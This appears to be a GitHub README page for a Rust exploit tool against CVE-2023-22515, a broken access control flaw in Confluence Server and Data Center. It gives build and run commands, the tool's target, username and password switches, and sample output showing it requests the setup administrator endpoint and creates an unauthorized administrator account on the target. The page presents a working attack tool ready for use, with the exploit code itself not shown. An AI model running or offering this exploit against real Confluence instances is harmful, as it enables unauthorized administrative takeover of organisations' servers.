joaoviictorti / CVE-2023-22515

CVE-2023-22515 (Confluence Broken Access Control Exploit)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-22515

Overview

Confluence is a web-based enterprise wiki developed by Australian software company Atlassian. Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.

The vulnerability has been classified as CVE-2023-22515

Compile

First perform the compilation with the command:

cargo build --release

Usage

You can do it in these two ways:

cargo run -- --target http://localhost --username "teste" --password "teste" 
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

This will display help for the tool. Here are all the switches it supports:

CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

Running CVE-2023-22515

cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!

About

CVE-2023-22515 (Confluence Broken Access Control Exploit)


Languages

Language:Rust 100.0%